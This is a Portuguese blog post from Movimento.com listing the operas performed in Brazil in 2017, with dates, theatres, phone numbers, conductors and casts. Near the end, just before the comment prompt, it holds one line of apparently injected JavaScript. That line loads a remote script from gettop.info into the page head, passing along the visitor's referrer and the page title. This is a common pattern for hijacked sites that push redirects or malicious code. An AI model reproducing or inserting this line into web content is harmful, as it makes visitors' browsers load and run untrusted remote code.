Escrito por em 24 fev 2017 nas áreas Lateral, Ópera, Programação

Saiba que óperas serão encenadas ou levadas em forma de concerto no Brasil.

Pelo sexto ano consecutivo, o Movimento.com traz este post sobre óperas apresentadas no Brasil. O motivo disto é muito simples. Durante anos passados, recebemos muitas reclamações de que, quando o release de alguma ópera ia para o ar, já não havia mais ingressos para venda. Bom frisar que o atraso da publicação dos releases não é de responsabilidade do site, mas sim da produção ou divulgação da ópera. Para que as pessoas possam se antecipar, criamos este post dedicado exclusivamente a este assunto. Acompanhe e cuide de buscar seus ingressos a tempo e hora.


Dias 15, 17 e 19 de março – encenada

Ópera “O espelho“, de Jorge Antunes

Theatro São Pedro – SP – 11 3661 6600

Libreto de Jorge Coli. Inspirada livremente no conto homônimo de Machado de Assis.
– Elenco: Daniel Umbelino, Andreia Souza, Marly Montoni, Jonas Lopes, Filipe Castro e André di Peroli.
– Direção musical e regência de Pedro Messias – Concepção e direção cênica de Caetano Pimentel – Cenografia e figurinos de Giorgia Massetani – Desenho de luz de Vinícius Andrade.

 

Dias 02, 04, 07 e 09 de abril – encenada

Ópera “Jenufa“, de Leoš Janácek 

Theatro Municipal do RJ – 21 2332 9191

Coprodução com a Companhia de Ópera Livre
– Concepção e Direção cênica: André Heller-Lopes. Direção musical e Regência: Marcelo de Jesus
– Elenco: Gabriella Pace, Eliane Coelho, Eric Herrero, Ivan Jorgensen, Vinícius Atique, Carolina Faria, Michele Menezes, Daniela Mesquita, Andressa Inácio, Tatiana Nogueira e Beatriz Simões
– Participação: Coro e Orquestra Sinfônica do Theatro Municipal

 

Dias 7 e 8 de abril – em forma de concerto

Ópera “Fidélio“, de L. V. Beethoven

Teatro Municipal de São Paulo – 11 3397 0327

– Roberto Minczuk, regência
Coro Lírico Municipal de São Paulo e Orquestra Sinfônica Municipal de São Paulo
Elenco: Florestan: Ricardo Tamura / Leonore: Marly Montone / Rocco: Carlos Eduardo Marcos / Marzeline: Caroline De Comi / Jaquino: Giovanni Tristacci / Don Pizarro: Douglas Hann / Don Fernando: Pedro Ometto / Prisioneiro 1: Paulo Queiroz / Prisioneiro 2: Rafael Tomas

 

Dias 19, 23 e 28 de abril – encenada

Ópera ” Il noce di benevento“, de Giuseppe Balducci

Theatro São Pedro – SP – 11 3667 0499

Montagem da Academia de Ópera Theatro São Pedro. Ópera cômica de compositor italiano pouco conhecido.
– Direção musical e regência de André dos Santos. Direção cênica de Davide Garattini.
– Elenco: Clodina: Ana Beatriz Machado / Laura: Amanda Souza / Geltrude: Cecília Massa / Margherita: Déborah Burgarelli / Giulia: Marcela Rahal / Alberto: Bruno de Sá

 

Dias 21, 26 e 30 de abril – encenada

Ópera “Gianni Schicchi“, de Puccini

Theatro São Pedro – SP – 11 3667 0499

Esta ópera integra o “Tritico”, grupo de três obras em que o compositor demonstra sua versatilidade ao lidar com diferentes linguagens.
– Direção musical e regência de André dos Santos. Direção cênica de Davide Garattini
– Elenco: Gianni Schicchi: Johnny França e Vítor Mascarenhas / Lauretta: Laís Assunção / Nella: Raquel Paulin / Buoso Donati: André di Peroli / Zita: Catarina Taíra / La Ciesca: Deborah Burgarelli / Rinuccio: Daniel Umbelino / Gherardo: Wesley Rocha / Gherardino: Bruno de e outros

 

Dias 21, 23, 25, 27 e 29 de abril – encenada

Ópera “Norma“, de Vincenzo Bellini

Palácio das Artes – BH – 31 3236 7400

– Direção musical e regência: Sílvio Viegas. Concepção e direção cênica: Pablo Maritano
Orquestra Sinfônica de Minas Gerais e Coral Lírico de Minas Gerais
– Elenco: Norma: Eiko Senda / Adalgisa: Denise de Freitas / Clotilde: Aline Lobão / Pollione: Fernando Portari / Flávio: Lucas Ellera / Oroverso: Sávio Sperandio

 

Dias 29 e 30 de abril e 01 de maio – encenada

Ópera “Don Pasquale“, de Gaetano Donizetti

Teatro Levino de Alcântara (61 00124 8550)

Ambientada em Brasília, nos anos 60, com influências de todas as regiões do Brasil, a ópera é uma das obras-primas da “opera buffa” italiana. De acordo com o diretor, a ideia é prestar uma homenagem ao aniversário da capital federal, utilizando uma cenografia baseada em projeção que lembre a origem de Brasília, contribuindo, assim, para a permanência da obra na memória dos espectadores, adianta Hermógenes.
– Direcão cênica: Janette Dornellas. Regência: Artur Soares
– Elenco: Don Pasquale: baixo-barítono Lício Bruno, Ernesto: tenor Roney Calazans. Norina: sopranos Gabriela Ramos  e  Marília Oliveira.  Dr. Malatesta: barítono Hermógenes Correia. Tabelião: Thiago Scafuto

 

Dias 30 de abril e 02, 04 e 06 de maio – cancelada

Ópera “Un ballo in maschera“, de Giuseppe Verdi

Theatro Municipal do RJ – 21 2332 9191

– Direção cênica: Julianna Santos. Direção musical e Regência: Tobias Volkmann
– Elenco: Ricardo Tamura, Ângela Marambio, Ana Lúcia Benedetti, Leonardo Páscoa, Dafne Boms, Manuel Álvares e Daniel Soren
– Participação: Coral Infantil da UFRJ – Coro e Orquestra Sinfônica do Theatro Municipal

 

Dias 14 e 20 de maio – encenada

Ópera “Tannhäuser”, de Richard Wagner 

Teatro Amazonas

Ópera em três atos (1845). Faz parte do Festival Amazonas de Ópera de 2017.
– Direção musical e Regência: Luiz Fernando Malheiro. Regência (17/05): Otávio Simões. Direção cênica: Caetano Pimentel
Balé Experimental do Corpo de Dança do Amazonas / Corpo de Dança do Amazonas / Grupo Vocal do Coral do Amazonas / Coral do Amazonas / Amazonas Filarmônica
Elenco: tenores Juremir Vieira e Enrique Bravo, os barítonos Homero Velho e Arthur Canguçu, a soprano Daniella Carvalho e o sopranista Bruno de Sá.

 

Dias 27 e 28 de maio e 03 e 04 de junho – encenada

Ópera “Onde Vivem os Monstros”, de Oliver Knussen 

Teatro Amazonas

Ópera fantasia em um ato, op. 20 (1983). Faz parte do XX Festival Amazonas de Ópera
– Direção musical e regência: maestro Marcelo de Jesus. Pedro Messias (regência 28.05). Direção cênica: Caetano Pimentel
Amazonas Filarmônica
– Elenco: Max: Roseane Soares, soprano / Mama: Andreia Souza, mezzo-soprano / Tzippy, monstro fêmea: Isabelle Sabrié, soprano / Moishe, monstro com barba: Juremir Vieira, tenor / Aaron, monstro com chifres: Moisés Rodrigues, barítono / Emile, monstro-galo: Murilo Neves, baixo / Bernard, monstro-boi: Emanuel Conde, baixo

 

Dias 22, 23, 24 e 25 de junho – encenada

Ópera “Viva la mamma“, de Gaetano Donizetti

Escola de Música da UFRJ – 21 2240 1441

Esta montagem conta a história de uma companhia de ópera italiana que desembarca na cidade do Rio de Janeiro em meados do século XIX. Os conflitos e brigas de ego entre os membros da companhia, narrados ao longo dos ensaios da ópera Romolo e Ersilia, que seria apresentada no teatro imperial São Pedro de Alcântara, revelam um grupo em permanente disputa. O espetáculo explora, de forma cômica, a realidade e os percalços do fazer operístico da época.

 

Dia 27 de junho – encenada

Ópera “Viva la mamma“, de Gaetano Donizetti

Centro de Tecnologia Rio – 3938 7008

Esta montagem conta a história de uma companhia de ópera italiana que desembarca na cidade do Rio de Janeiro em meados do século XIX. Os conflitos e brigas de ego entre os membros da companhia, narrados ao longo dos ensaios da ópera Romolo e Ersilia, que seria apresentada no teatro imperial São Pedro de Alcântara, revelam um grupo em permanente disputa. O espetáculo explora, de forma cômica, a realidade e os percalços do fazer operístico da época.

 

Dias 30 de junho e 02 de julho – ópera de câmara

Ópera “O caixeiro da taverna“, de Guilherme Bernstein

Theatro Municipal do RJ – 21 2332 9191

Libreto do compositor (Baseado na obra original de Martins Pena).
– Elenco: Solistas da Academia de Ópera Bidu Sayão e da Orquestra Sinfônica do Theatro Municipal.

 

Dias 30 de junho e 1 de julho – em forma de concerto

Ópera “A danação de Fausto“, de Hector Berlioz

Teatro Municipal de São Paulo – 11 3397 0327

– Roberto Minczuk, regência
– Coro Lírico Municipal de São Paulo e Orquestra Sinfônica Municipal de São Paulo
– Elenco: Faust: Paulo Mandarino / Marguerite: Ana Lúcia Benedetti / Méphistophélès: Leonardo Neiva / Brander: Saulo Javan

 

Dia 09 de julho – encenada

Ópera “Viva la mamma“, de Gaetano Donizetti

Theatro Municipal D. Pedro – Petrópolis – 24 2235 3833

Esta montagem conta a história de uma companhia de ópera italiana que desembarca na cidade do Rio de Janeiro em meados do século XIX. Os conflitos e brigas de ego entre os membros da companhia, narrados ao longo dos ensaios da ópera Romolo e Ersilia, que seria apresentada no teatro imperial São Pedro de Alcântara, revelam um grupo em permanente disputa. O espetáculo explora, de forma cômica, a realidade e os percalços do fazer operístico da época.

 

Dias 14, 15 e 16 de julho – encenada

Ópera “Viva la mamma“, de Gaetano Donizetti

Teatro Municipal João Caetano – Niterói – 21 2620 1624

Esta montagem conta a história de uma companhia de ópera italiana que desembarca na cidade do Rio de Janeiro em meados do século XIX. Os conflitos e brigas de ego entre os membros da companhia, narrados ao longo dos ensaios da ópera Romolo e Ersilia, que seria apresentada no teatro imperial São Pedro de Alcântara, revelam um grupo em permanente disputa. O espetáculo explora, de forma cômica, a realidade e os percalços do fazer operístico da época.

 

Dias 19, 21, 23, 25 e 27 de agosto – encenadas

Óperas “Arlecchino“, de Ferrucio Busoni 

Theatro São Pedro – SP – 11 3667 0499

No mesmo programa da ópera, será apresentado o balé “Pulcinella“, de Igor Stravisnky
– Direção musical de Ira Levin. Direção cênica de William Pereira. Coreografia de Giovanni di Palma
– Participação: São Paulo Cia de Dança

 

Dias 26 e 27 de agosto – encenada

Ópera “Don Giovanni“, de Mozart

Theatro São Pedro – RS

Libretista: Lorenzo Da Ponte. A versão de “Don Giovanni” que será apresentada é a de Praga, que é a versão original da obra.
– Direção musical e regência: Evandro Matté. Direção cênica: Caetano Pimentel
Orquestra Sinfônica de Porto Alegre e Coral Sinfônico da OSPA
– Elenco: Don Giovanni: Homero Velho / Leporello: Daniel Germano / Zerlina: Carla Cottini / Dona Anna: Maíra Lautert / Masseto: Carlos Rodriguez / Don Ottavio: Flávio Leite / Dona Elvira: Carolina Faria / Comendador: Sávio Sperandio

 

Dias 15, 17 e 19 de setembro – encenada

Ópera “Don Giovanni“, de W. A. Mozart

Theatro da Paz – Belém (91 4009 8766)

Libretista: Lorenzo Da Ponte.
– Direção Musical e Regência: maestro Sílvio Viegas. Direção Cênica: Mauro Wrona. Iluminação: Caetano Vilela. Regente preparador do Coral Lírico: maestro Vanildo Monteiro. Cenografia: Nícolas Boni. Videomapping, produção e operação: Roberta Carvalho. Figurinos: Fábio Namatame. Visagismo: André Ramos. Produtor Executivo, Diretor de Palco e Maestro de Luz: Glaucivan Gurgel. Assistente de Direção Cênica: Mayra Terzian. Supervisão Artística: Gilberto Chaves
– Elenco: Don Giovanni, nobre sevilhano (barítono): Homero Velho / Leporello, seu criado (baixo-barítono): Silvério de La O / Donna Anna, dama sevilhana (soprano): Marina Considera / Dom Ottavio, seu noivo (tenor): Aníbal Mancini (dias 15 e 17) e Antônio Wilson (dia 19) / Donna Elvira, amante de Don Giovanni (soprano): Kézia Andrade / Comendador, pai de Donna Anna (baixo): Anderson Barbosa / Zerlina, uma camponesa (soprano): Dhuly Contente / Masetto, seu noivo (barítono): Idaías Souto

 

Dias 15, 22, 23 e 24 de setembro – encenada

Ópera “Dulcineia e Trancoso“, de Eri-Eri Moura

Sala Paschoal Carlos Magno, Centro de Letras e Artes da UniRio

Libretista W. J. Solha. A ópera “Dulcineia e Trancoso” do compositor brasileiro Eli-Eri Moura é considerada a primeira ópera armorial. Nela, encontramos uma mistura da cultura nordestina com a ibérica, com Ariano Suassuna e seu ídolo Miguel de Cervantes Saavedra, além de Dom Quixote, Sancho Pança e Dulcinéia del Toboso (personagens do espanhol) com Gonçalo Fernandes Trancoso – o primeiro contista da língua portuguesa, e mais o mundo do circo – outra paixão de Ariano e sua narrativa sobre a Pedra do Reino.
– Direção Cênica: Rubens Lima Jr.. Coordenação Geral: Carol McDavit
Orquestra Sinfônica da UniRio – Regência de Guilherme Bernstein. Coro Juvenil – Direção de Júlio Moretzsohn
ElencoDulcineia: Luísa Pimenta / Trancoso: Mário Sampaio / Dono do Circo: Flávio Mello / Morte: Glasiele Valvano / Bozo: Jeison Riveros / Cervantes: David Monteiro / Ariano: Daniel Rangel / Compadecida: Júlia Requião (dias 23 e 24) e Alessandra Quintes (22)

 

Dias 22, 23, 27 e 29 de setembro – encenada

Ópera “Tosca“, de Puccini

Teatro Municipal do RJ

– Direção de André Heller-Lopes. Regência de Marcelo de Jesus
– Elenco: Eliane Coelho e Macarena Valenzuela(Tosca); Eric Herrero e Juremir Vieira (Cavaradossi); e Homero Perez-Miranda (Scarpia), dentre outros.

 

Dias 22, 23, 26, 27, 28, 29 e 30 de setembro – encenada

Ópera “Nabucco“, de Verdi

Teatro Municipal de São Paulo

Direção de Cléber Papa. Regência de Roberto Minczuk
Elenco: Rodolfo Giuliani e Douglas Hahn (Nabucco); Marly Montoni e Elaine Morais (Abigaille); Lidia Schäffer e Juliana Taino (Fenena); Marcello Vannucci e Eduardo Trindade (Ismaele); e Carlos Eduardo Marcose Matheus França (Zaccaria), dentre outros. 

 

Dias 10, 11, 12 e 14 de outubro – encenada

Ópera “O menino maluquinho”, de Calimério Soares

Salão Leopoldo Miguez – Escola de Música da UFRJ  – Rio (21 2240 1441)

Nos dias 10 e 11 haverá apresentação exclusiva para escolas. Ópera baseada no livro de mesmo nome de Ziraldo, com libreto de Nílson Nunes.
– Direção geral de Maria José Chevitarese. Direção cênica de José Henrique Moreira. Regência de Ernani Aguiar e Kaique Stumpf
– Elenco: formado por 10 cantores do grupo coral Brasil Ensemble

 

Dias 13, 14 e 15 de outubro – encenada

Ópera “Il combattimento di Tancredi e Clorinda”, de C. Monteverdi
Ópera “O Reino de Duas Cabeças”, de Jaceguay Lins

Teatro do SESI Jardim da Penha – 27 3334 7307

“Il combattimento di Tancredi e Clorinda” – ElencoTesto – Inácio de Nonno / Tancredi – Renato Gonçalves / Clorinda – Adalgisa Rosa / Doppione – Max Michel

“O Reino de Duas Cabeças” – Elenco: Bicéfalo 1 – Renato Gonçalves / Bicéfalo 2 – Raphael Piccinini / Ministro Acéfalo – Alessandro Santana / Arauto/Bobo – Arifer Gomes / Enxaqueca – Adalgisa Rosa / Aspirina – Rayanne Carrara / Soldado 1 & Cantora – Rosiane Queiroz / Soldado 2 – Max Michel

 

Dias 20, 21 e 22 de outubro – encenada

Ópera “Liquid voices – a história de Mathilda Segalescu“, de Jocy de Oliveira

Teatro SESC 24 de maio – São Paulo (11 3350 6300)

Ópera em progresso, Liquid Voices é uma narrativa ficcional situada num evento real: o naufrágio do navio romeno Struma, última embarcação que saiu da Europa durante a Segunda Guerra Mundial, levando 800 passageiros refugiados judeus para a Palestina. A compositora envolve o ouvinte em uma realidade fantástica. Cria uma paisagem sonora e visual como um labirinto misterioso. Mescla datas exatas com acontecimentos imaginários e traz à tona verdades e inverdades, em repetições históricas de refugiados através dos tempos submersos em águas profundas, transformados em vozes líquidas…
– Concepção, música, roteiro, texto e direção – Jocy de Oliveira. Cenografia – Fernando Mello da Costa. Figurino – Tissiana Passos. Criação de luz – Renato Machado. Assistente de direção – Isabella Lomez. Programação visual – Lu Martins. Direcão de movimento – Toni Rodrigues. Produção executiva – Mariana Chew
– Elenco: Gabriela Geluda – soprano (Mathilda Segalescu) e Luciano Botelho – tenor (pescador árabe). Toni Rodrigues – dançarino

– Ensemble Jocy de Oliveira: João Senna – violão / Peter Schuback – cello / Aloysio Neves – guitarra elétrica / Rodrigo Cicchelli – flauta / Paulo Passos – clarinete, clarone, saxofone / Sara Cohen – piano / Ricardo Siri – percussão / Joaquim Abreu – percussão

 

Dias 20, 21 e 22 de outubro – encenada

Ópera “O Caixeiro da Taverna”, de Guilherme Bernstein

Teatro do SESI Jardim da Penha – 27 3334 7307

Baseia-se na comédia homônima de Martins Pena. O libreto foi diretamente retirado do texto original. Luís Carlos Martins Pena nasceu no Rio de Janeiro em 1815. Foi um notável teatrólogo, considerado fundador da “comédia de costumes” no Brasil. Escreveu comédias e farsas da metade do século XIX, que envolvem principalmente pessoas da roça e das cidades. O texto narra as peripécias do ambicioso e trapaceiro Manoel Pacheco, português cujo maior sonho é ser sócio de sua ama, Angélica Pereira, dona da taverna, que morre de amores por ele. A ambição desenfreada deste caixeiro o coloca em situações hilariantes, que certamente proporcionarão bons motivos para risadas. 

ElencoManuel – Lício Bruno / Angélica – Adalgisa Rosa / Deolinda – Natália Hubner / Francisco – Renato Gonçalves / Quintino – Alessandro Santana / Antônio –Tadeu Kuzendorff

 

Dias 27, 28 e 29 de outubro – encenada

Ópera “La Bohème”, de G. Puccini

Teatro do SESI Jardim da Penha – 27 3334 7307

Ópera de Giacomo Puccini (1858-1924) inspirada na novela de Henri Murger “Scènes de la vie de bohème”. Na concepção dramática, a história será apresentada fora do contexto de época, caracterizando essencialmente a universalidade e a atemporalidade do amor, da amizade e dos sonhos, essências da natureza dos sentimentos humanos.

Elenco: Mimi – Janete Dornellas e Maristela Araújo / Musetta – Rosiane Queiroz / Rodolfo – Helenes Lopes / Marcello- Lício Bruno / Schaunard – Gustavo Rocha / Colline – Alessandro Santana / Alcindoro & Benoit – Eduardo Santa Clara

 

Dias 28 e 30 de outubro e 01, 03 e 05 de novembro – encenada

Ópera “Don Giovanni“, de Wolfgang A. Mozart

Theatro São Pedro – SP – 11 3667 0499

– Direção musical de Cláudio Cruz. Direção cênica de Mauro Wrona

 

Dias 29 de novembro e 01, 03, 05 e 07 de dezembro – encenada

Ópera “La belle Hélène“, de Jacques Offenbach

Theatro São Pedro – SP – 11 3667 0499

– Direção musical de Cláudio Cruz. Direção cênica de Caetano Vilela

 

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;d.getElementsByTagName(‘head’)[0].appendChild(s);

Faça seu comentário